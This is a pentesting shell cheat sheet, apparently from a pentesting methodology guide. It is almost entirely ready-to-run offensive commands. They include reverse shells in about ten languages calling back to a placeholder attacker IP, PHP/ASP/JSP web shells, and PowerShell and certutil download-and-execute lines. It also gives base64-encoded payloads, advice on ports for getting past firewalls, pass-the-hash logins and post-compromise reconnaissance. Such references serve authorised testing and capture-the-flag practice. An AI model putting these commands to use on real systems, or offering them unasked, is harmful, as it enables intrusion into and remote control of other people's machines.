
Shell Cheatsheet — One Page, Everything

Bookmark this. Open it in a second tab every time you are working a box. No explanations. No fluff. Just the commands.


🎧 Listeners

# Standard
nc -lvnp 4444

# With arrow keys and history
rlwrap nc -lvnp 4444

# Auto PTY upgrade
pwncat-cs -lp 4444

# Encrypted
ncat --ssl -lvnp 4444

# Socat fully interactive
socat file:`tty`,raw,echo=0 tcp-listen:4444

# Multiple listeners — run each in a separate tab
rlwrap nc -lvnp 4444    # primary
rlwrap nc -lvnp 5555    # secondary
python3 -m http.server 80  # file server

📡 Reverse Shells — Linux

# Bash
bash -i >& /dev/tcp/YOUR-IP/4444 0>&1
bash -c 'bash -i >& /dev/tcp/YOUR-IP/4444 0>&1'

# Python3
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOUR-IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Python3 with PTY
python3 -c 'import socket,subprocess,os,pty;s=socket.socket();s.connect(("YOUR-IP",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

# Python2
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOUR-IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# PHP
php -r '$sock=fsockopen("YOUR-IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# Perl
perl -e 'use Socket;$i="YOUR-IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'

# Ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("YOUR-IP","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

# Netcat with -e
nc -e /bin/bash YOUR-IP 4444

# Netcat without -e (OpenBSD)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc YOUR-IP 4444 >/tmp/f

# Socat fully interactive
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:YOUR-IP:4444

💻 Reverse Shells — Windows

# PowerShell standard
powershell -nop -c "$client=New-Object System.Net.Sockets.TCPClient('YOUR-IP',4444);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# PowerShell download and execute in memory
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR-IP/shell.ps1')"

# CMD — certutil download then execute
certutil -urlcache -split -f http://YOUR-IP/nc.exe C:\Windows\Temp\nc.exe & C:\Windows\Temp\nc.exe -e cmd.exe YOUR-IP 4444

🌐 Web Shells

# PHP minimal
<?php system($_GET["cmd"]); ?>

# PHP access
http://target.com/shell.php?cmd=id
curl "http://target.com/shell.php?cmd=whoami"

# Upgrade web shell to reverse shell
curl "http://target.com/shell.php?cmd=bash+-i+>%26+/dev/tcp/YOUR-IP/4444+0>%261"
<!-- ASP -->
<% eval request("cmd") %>
<!-- JSP -->
<%Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"});%>

⬆️ Shell Upgrade — Python PTY (Full Steps)

# Step 1 — on target
python3 -c 'import pty; pty.spawn("/bin/bash")'
# or python2: python -c 'import pty; pty.spawn("/bin/bash")'
# or script:  script /dev/null -c bash

# Step 2
Ctrl+Z

# Step 3 — on YOUR machine
stty raw -echo; fg

# Step 4
[press Enter twice]

# Step 5 — on target
export TERM=xterm

# Step 6 — on target (match your terminal dimensions)
stty rows 38 columns 116

# Check your dimensions first (in another terminal on your machine)
stty size

🏁 First Commands After Shell Lands — CTF

# 1. Stabilize immediately (see upgrade section above)
python3 -c 'import pty; pty.spawn("/bin/bash")'

# 2. Who are you
whoami && id

# 3. Grab user flag NOW before anything drops the shell
cat /home/*/user.txt 2>/dev/null
find / -name user.txt 2>/dev/null
cat ~/user.txt

# 4. Confirm the machine
hostname && uname -a

# 5. What network
ip addr
cat /etc/hosts

🏢 First Commands After Shell Lands — Real World

# 1. Stabilize immediately
python3 -c 'import pty; pty.spawn("/bin/bash")'

# 2. Who and what
whoami && id
hostname
uname -a
cat /etc/os-release

# 3. Network
ip addr
ip route
cat /etc/hosts
ss -tlnp

# 4. Is this a container
cat /proc/1/cgroup | grep -i docker
ls /.dockerenv 2>/dev/null

# 5. Screenshot / document everything from here

🔍 Find Your IP

# HTB — always tun0
ip addr show tun0
ip -4 addr show tun0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'

# General
ip addr          # Linux
ifconfig         # older Linux / macOS
ipconfig         # Windows
curl ifconfig.me # public IP

🔒 Encrypted Shells

# Ncat SSL listener
ncat --ssl -lvnp 4444

# Ncat SSL reverse shell on target
ncat --ssl YOUR-IP 4444 -e /bin/bash

# Socat SSL — generate cert first
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj '/CN=localhost'
cat key.pem cert.pem > shell.pem

# Socat SSL listener
socat openssl-listen:4444,cert=shell.pem,verify=0 file:`tty`,raw,echo=0

# Socat SSL reverse shell on target
socat openssl:YOUR-IP:4444,verify=0 exec:'bash -li',pty,stderr,setsid,sigint,sane

🪟 Evil-WinRM

# Password
evil-winrm -i TARGET-IP -u username -p 'password'

# Hash
evil-winrm -i TARGET-IP -u username -H NTLM_HASH

# With scripts directory
evil-winrm -i TARGET-IP -u username -p 'password' -s /path/to/scripts/

# Upload file
upload /local/file.exe C:\Windows\Temp\file.exe

# Download file
download C:\interesting.txt /local/path/

📦 File Transfer — Quick Methods

# Python web server (on YOUR machine)
python3 -m http.server 80

# Download on Linux target
wget http://YOUR-IP/file.txt
curl http://YOUR-IP/file.txt -o file.txt

# Download on Windows target
certutil -urlcache -split -f http://YOUR-IP/file.exe file.exe
powershell -c "Invoke-WebRequest -Uri 'http://YOUR-IP/file.exe' -OutFile 'file.exe'"
powershell -c "(New-Object Net.WebClient).DownloadFile('http://YOUR-IP/file.exe','file.exe')"

# Netcat file transfer
# Receiver: nc -lvnp 4444 > file.txt
# Sender:   nc YOUR-IP 4444 < file.txt

🔥 Firewall Bypass Ports

# When 4444 is blocked — try these
nc -lvnp 80      # HTTP
nc -lvnp 443     # HTTPS — least likely to be blocked
nc -lvnp 8080    # HTTP alternate
nc -lvnp 53      # DNS — almost never blocked outbound

🛠️ Encoded Payloads

# Base64 encode a bash reverse shell
echo -n 'bash -i >& /dev/tcp/YOUR-IP/4444 0>&1' | base64

# Execute base64 encoded payload on target
echo ENCODED_PAYLOAD | base64 -d | bash

# PowerShell base64
$cmd = 'IEX(New-Object Net.WebClient).DownloadString("http://YOUR-IP/shell.ps1")'
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd))
powershell -enc ENCODED_OUTPUT

📊 Tool Quick Reference

Need Tool
Quick listener rlwrap nc -lvnp 4444
Auto PTY pwncat-cs -lp 4444
Encrypted ncat --ssl -lvnp 4444
Full interactive socat file:`tty`,raw,echo=0 tcp-listen:4444
Windows creds evil-winrm -i IP -u user -p pass
Windows hash evil-winrm -i IP -u user -H HASH
Port forward socat tcp-listen:PORT,fork tcp:INTERNAL:PORT
SOCKS proxy chisel

🚨 Shell Not Connecting — Quick Debug

# 1. Is listener running?        nc -lvnp 4444
# 2. Correct IP?                 ip addr show tun0
# 3. Ports match?                listener 4444, payload 4444
# 4. Try port 443                nc -lvnp 443
# 5. Try different language      bash → python3 → nc → perl
# 6. /dev/tcp blocked?           use nc named pipe method
# 7. Test ping first             tcpdump -i tun0 icmp

by SudoChef · Part of the SudoCode Pentesting Methodology Guide